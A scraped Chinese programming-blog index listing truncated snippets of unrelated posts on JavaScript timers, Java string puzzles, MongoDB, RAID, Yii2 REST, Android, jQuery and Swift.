    第一种:精确到秒的javascript倒计时代码      HTML代码:   <form name="form1">   <div align="center" align="middle"
  • java-37.有n 个长为m+1 的字符串,如果某个字符串的最后m 个字符与某个字符串的前m 个字符匹配,则两个字符串可以联接 bylijinnan java
    public class MaxCatenate { /* * Q.37 有n 个长为m+1 的字符串,如果某个字符串的最后m 个字符与某个字符串的前m 个字符匹配,则两个字符串可以联接, * 问这n 个字符串最多可以连成一个多长的字符串,如果出现循环,则返回错误。 */ public static void main(String[] args){
  • mongoDB安装 开窍的石头 mongodb安装 基本操作
    mongoDB的安装          1:mongoDB下载   https://www.mongodb.org/downloads         2:下载mongoDB下载后解压     
  • [开源项目]引擎的关键意义 comsci 开源项目
         一个系统,最核心的东西就是引擎。。。。。       而要设计和制造出引擎,最关键的是要坚持。。。。。。       现在最先进的引擎技术,也是从莱特兄弟那里出现的,但是中间一直没有断过研发的    
  • 软件度量的一些方法 cuiyadll 方法
    软件度量的一些方法http://cuiyingfeng.blog.51cto.com/43841/6775/在前面我们已介绍了组成软件度量的几个方面。在这里我们将先给出关于这几个方面的一个纲要介绍。在后面我们还会作进一步具体的阐述。当我们不从高层次的概念级来看软件度量及其目标的时候,我们很容易把这些活动看成是不同而且毫不相干的。我们现在希望表明他们是怎样恰如其分地嵌入我们的框架的。也就是我们度量的
  • XSD中的targetNameSpace解释 darrenzhu xmlnamespacexsdtargetnamespace
    参考链接: http://blog.csdn.net/colin1014/article/details/357694 xsd文件中定义了一个targetNameSpace后,其内部定义的元素,属性,类型等都属于该targetNameSpace,其自身或外部xsd文件使用这些元素,属性等都必须从定义的targetNameSpace中找: 例如:以下xsd文件,就出现了该错误,即便是在一
  • 什么是RAID0、RAID1、RAID0+1、RAID5,等磁盘阵列模式? dcj3sjt126com raid
    RAID 1又称为Mirror或Mirroring,它的宗旨是最大限度的保证用户数据的可用性和可修复性。 RAID 1的操作方式是把用户写入硬盘的数据百分之百地自动复制到另外一个硬盘上。由于对存储的数据进行百分之百的备份,在所有RAID级别中,RAID 1提供最高的数据安全保障。同样,由于数据的百分之百备份,备份数据占了总存储空间的一半,因而,Mirror的磁盘空间利用率低,存储成本高。 Mir
  • yii2 restful web服务快速入门 dcj3sjt126com PHPyii2
    快速入门 Yii 提供了一整套用来简化实现 RESTful 风格的 Web Service 服务的 API。 特别是,Yii 支持以下关于 RESTful 风格的 API: 支持 Active Record 类的通用API的快速原型 涉及的响应格式(在默认情况下支持 JSON 和 XML) 支持可选输出字段的定制对象序列化 适当的格式的数据采集和验证错误
  • MongoDB查询(3)——内嵌文档查询(七) eksliang MongoDB查询内嵌文档MongoDB查询内嵌数组
    MongoDB查询内嵌文档 转载请出自出处:http://eksliang.iteye.com/blog/2177301 一、概述        有两种方法可以查询内嵌文档:查询整个文档;针对键值对进行查询。这两种方式是不同的,下面我通过例子进行分别说明。   二、查询整个文档 例如:有如下文档 db.emp.insert({ &qu
  • android4.4从系统图库无法加载图片的问题 gundumw100 android
    典型的使用场景就是要设置一个头像,头像需要从系统图库或者拍照获得,在android4.4之前,我用的代码没问题,但是今天使用android4.4的时候突然发现不灵了。baidu了一圈,终于解决了。 下面是解决方案: private String[] items = new String[] { "图库","拍照" }; /* 头像名称 */
  • 网页特效大全 jQuery等 ini JavaScriptjquerycsshtml5ini
    HTML5和CSS3知识和特效 asp.net ajax jquery实例 分享一个下雪的特效 jQuery倾斜的动画导航菜单 选美大赛示例 你会选谁 jQuery实现HTML5时钟 功能强大的滚动播放插件JQ-Slide 万圣节快乐!!! 向上弹出菜单jQuery插件 htm5视差动画 jquery将列表倒转顺序 推荐一个jQuery分页插件 jquery animate
  • swift objc_setAssociatedObject block(version1.2 xcode6.4) 啸笑天 version
      import UIKit class LSObjectWrapper: NSObject { let value: ((barButton: UIButton?) -> Void)? init(value: (barButton: UIButton?) -> Void) { self.value = value
  • Aegis 默认的 Xfire 绑定方式,将 XML 映射为 POJO MagicMa_007 javaPOJOxmlAegisxfire
          Aegis 是一个默认的 Xfire 绑定方式,它将 XML 映射为 POJO, 支持代码先行的开发.你开发服 务类与 POJO,它为你生成 XML schema/wsdl XML 和 注解映射概览       默认情况下,你的 POJO 类被是基于他们的名字与命名空间被序列化。如果
  • js get max value in (json) Array qiaolevip 每天进步一点点学习永无止境max纵观千象
    // Max value in Array var arr = [1,2,3,5,3,2];Math.max.apply(null, arr); // 5 // Max value in Jaon Array var arr = [{"x":"8/11/2009","y":0.026572007},{"x"
  • XMLhttpRequest 请求 XML,JSON ,POJO 数据 Luob. POJOjsonAjaxxmlXMLhttpREquest
    在使用XMlhttpRequest对象发送请求和响应之前,必须首先使用javaScript对象创建一个XMLHttpRquest对象。 var xmlhttp; function getXMLHttpRequest(){ if(window.ActiveXObject){ xmlhttp:new ActiveXObject("Microsoft.XMLHTTP
  • jquery wuai jquery
    以下防止文档在完全加载之前运行Jquery代码,否则会出现试图隐藏一个不存在的元素、获得未完全加载的图像的大小 等等 $(document).ready(function(){ jquery代码; }); <script type="text/javascript" src="c:/scripts/jquery-1.4.2.min.js&quo